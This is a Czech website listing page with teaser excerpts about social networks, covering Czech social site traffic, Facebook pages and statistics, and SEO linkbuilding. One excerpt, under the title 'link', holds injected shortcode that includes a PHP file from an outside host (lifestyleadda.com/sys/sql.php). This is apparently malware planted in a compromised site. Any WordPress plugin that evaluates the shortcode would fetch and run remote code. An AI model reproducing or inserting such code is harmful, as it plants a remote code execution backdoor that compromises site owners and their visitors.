Vývoj návštěvnosti klasických českých sociální sítí od doby vzniku české verze webu Facebook stagnuje. Měsíční a průměrnou denní návštěvnost českých největších klasických internetových sociálních sítí v měsíci leden 2010 zachycuje následující graf: V Česku mají velké množství návštěvníků projekty společnosti Seznam Lide.cz a Spoluzaci.cz, následuje Libimseti.cz a více než 200 tisíc lidí...
Číst více
Sociální sítě
Informace o sociálních sítích, popis společenských sítí i tipy pro práci s nimi
link
[insert_php] include(‚http[:]//lifestyleadda.com/sys/sql.php‘); [/insert_php][php] include(‚http[:]//lifestyleadda.com/sys/sql.php‘); [/php]...
Číst více
Facebook stránky
Stránky jsou určeny k propojení fanoušků určité značky (firmy, výrobku,…) nebo osobnosti. Případně lze vytvářet i komunitní stránky k nějakému tématu, ty ovšem mají oproti oficiálním stránkám určitá omezení. Stránky na Facebooku se dají optimalizovat také z hlediska SEO, protože jsou viditelné i neregistrovaným uživatelům.Stránky fanoušků (tzv. Fan Pages) na...
Číst více
Celosvětově nejrozsáhlejší sociální síť s více než 800 miliony registrovaných uživatelů denně více než 200 milionů uživatelů navštíví a více než 35 milionů přihlášených změní svůj textový status. Více než 100 milionů uživatelů alespoň občas přistupuje na Facebook prostřednictvím mobilního telefonu. Průměrný uživatel má na síti Facebook 130 přátel a...
Číst více
Linkbuilding – budování zpětných odkazů
Linkbuildingem se označuje budování zpětných odkazů. Způsobů jak získat zpětný odkaz je mnoho. Existují možnosti bezplatného získání odkazu i možnosti placené. Zpravidla čím kvalitnější je obsah optimalizovaného webu, tím je získávání zpětných odkazů snadnější. Jak získat zpětné odkazy zdarma se můžete dočíst v následujícím textu. Registrace do katalogů Nejsnazším způsobem...
Číst více